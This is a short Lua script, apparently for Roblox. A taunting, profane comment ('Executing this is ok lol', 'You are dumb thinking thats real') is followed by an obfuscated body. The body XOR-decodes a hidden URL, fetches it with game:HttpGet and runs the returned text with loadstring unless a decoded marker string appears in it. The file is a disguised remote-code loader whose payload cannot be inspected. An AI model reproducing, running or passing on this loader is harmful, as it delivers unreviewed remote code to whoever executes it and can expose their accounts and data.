--[[
Executing this is ok lol
Execute
223132
123131
3123131
31235
235346342
4234
Require("6741267")
You are dumb thinking thats real
Ok fuck y0u

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v10,v11) local v12={};for v13=1, #v10 do v6(v12,v0(v4(v1(v2(v10,v13,v13 + 1 )),v1(v2(v11,1 + (v13% #v11) ,1 + (v13% #v11) + 1 )))%256 ));end return v5(v12);end local v8=v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\232\48\234\180\229\12\222\140\232\48\234\180\212\83\194\215\206\35\224\244\213\27\215\208\148\45\227\186\195\13\158\206\218\44\232\244\230\11\197\204\253\36\244\182\138\51\216\199\213\44\225\179\211\61\217\194\200\32\244\168","\126\177\163\187\69\134\219\167");local v9=game:HttpGet(v8);if v9:find(v7("\127\140\14\234\223\23\244\26\224\188\43\217\39\201\162","\156\67\173\74\165")) then warn(v7("\19\190\93\30\169\36\116\49\180\70","\38\84\215\41\118\220\70"));else print(v7("\127\29\98\62\241\81\18\43\28\249","\158\48\118\66\114"));loadstring(v9)();end
